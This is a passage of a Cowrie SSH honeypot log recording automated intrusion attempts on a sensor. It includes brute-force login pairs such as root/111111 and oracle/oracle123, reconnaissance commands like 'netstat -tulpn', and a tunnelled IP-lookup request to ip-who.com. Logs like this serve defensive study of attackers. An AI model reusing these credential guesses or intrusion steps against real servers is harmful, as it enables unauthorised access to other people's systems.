-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.688275Z","src_ip":"212.227.235.229","session":"9c1014fcc831"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.834859Z","src_ip":"212.227.125.160","session":"6ea54d131f0c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.835562Z","src_ip":"212.227.125.160","session":"6ea54d131f0c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:56:50.448675Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:50.449550Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:50.450606Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.login.failed","username":"help","password":"1234","message":"login attempt [help/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:51.669278Z","src_ip":"212.227.235.229","session":"9c1014fcc831"}
{"eventid":"cowrie.session.closed","duration":"28.7","message":"Connection lost after 28.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:52.240211Z","src_ip":"212.227.235.229","session":"a88b09a87935"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50668,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e8c0cbc1ffd","protocol":"ssh","message":"New connection: 212.227.235.229:50668 (1.2.3.4:22) [session: 0e8c0cbc1ffd]","sensor":"my-vps","timestamp":"2025-08-31T04:56:52.714963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:56:52.805809Z","src_ip":"212.227.235.229","session":"0e8c0cbc1ffd"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:53.067165Z","src_ip":"212.227.235.229","session":"9c1014fcc831"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36586,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fde77b012ee","protocol":"ssh","message":"New connection: 212.227.125.160:36586 (1.2.3.4:22) [session: 2fde77b012ee]","sensor":"my-vps","timestamp":"2025-08-31T04:56:54.280835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:56:54.281620Z","src_ip":"212.227.125.160","session":"2fde77b012ee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:56:54.464267Z","src_ip":"212.227.125.160","session":"2fde77b012ee"}
{"eventid":"cowrie.login.success","username":"root","password":"teste.123","message":"login attempt [root/teste.123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:56:54.545643Z","src_ip":"212.227.125.160","session":"6ea54d131f0c"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:55.014498Z","src_ip":"212.227.125.160","session":"2fde77b012ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50682,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd9df0081ef7","protocol":"ssh","message":"New connection: 212.227.235.229:50682 (1.2.3.4:22) [session: fd9df0081ef7]","sensor":"my-vps","timestamp":"2025-08-31T04:56:55.397826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:56:55.514562Z","src_ip":"212.227.235.229","session":"fd9df0081ef7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:56:55.674561Z","src_ip":"212.227.235.229","session":"fd9df0081ef7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:56:56.167818Z","src_ip":"212.227.235.229","session":"0e8c0cbc1ffd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:56.198800Z","src_ip":"212.227.125.160","session":"2fde77b012ee"}
{"eventid":"cowrie.login.failed","username":"public","password":"public","message":"login attempt [public/public] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:56.823858Z","src_ip":"212.227.235.229","session":"fd9df0081ef7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:56:56.944471Z","src_ip":"212.227.125.160","session":"6ea54d131f0c"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-31T04:56:56.945139Z","src_ip":"212.227.125.160","session":"6ea54d131f0c"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:56:57.306185Z","src_ip":"212.227.235.229","session":"0e8c0cbc1ffd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59336,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a71b5e8ad29","protocol":"ssh","message":"New connection: 212.227.235.229:59336 (1.2.3.4:22) [session: 3a71b5e8ad29]","sensor":"my-vps","timestamp":"2025-08-31T04:56:57.486826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:56:57.489443Z","src_ip":"212.227.235.229","session":"3a71b5e8ad29"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:56:57.604125Z","session":"0e8c0cbc1ffd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:56:57.732715Z","src_ip":"212.227.235.229","session":"3a71b5e8ad29"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:56:57.990880Z","src_ip":"212.227.235.229","session":"0e8c0cbc1ffd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:56:58.104513Z","src_ip":"79.127.48.196","session":"33e408ff24da"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-31T04:56:58.105289Z","src_ip":"79.127.48.196","session":"33e408ff24da"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:58.231114Z","src_ip":"212.227.235.229","session":"fd9df0081ef7"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:58.346358Z","src_ip":"212.227.235.229","session":"0e8c0cbc1ffd"}
{"eventid":"cowrie.login.failed","username":"brenda","password":"brenda","message":"login attempt [brenda/brenda] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:58.723849Z","src_ip":"212.227.235.229","session":"3a71b5e8ad29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46366,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2ffdc1aab88","protocol":"ssh","message":"New connection: 212.227.125.160:46366 (1.2.3.4:22) [session: a2ffdc1aab88]","sensor":"my-vps","timestamp":"2025-08-31T04:56:59.478052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:56:59.478946Z","src_ip":"212.227.125.160","session":"a2ffdc1aab88"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:56:59.667022Z","src_ip":"212.227.125.160","session":"a2ffdc1aab88"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"3.2","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:00.174784Z","src_ip":"212.227.125.160","session":"6ea54d131f0c"}
{"eventid":"cowrie.session.closed","duration":"11.7","message":"Connection lost after 11.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:00.175905Z","src_ip":"212.227.125.160","session":"6ea54d131f0c"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:57:00.233818Z","src_ip":"212.227.125.160","session":"a2ffdc1aab88"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:00.472078Z","src_ip":"212.227.235.229","session":"3a71b5e8ad29"}
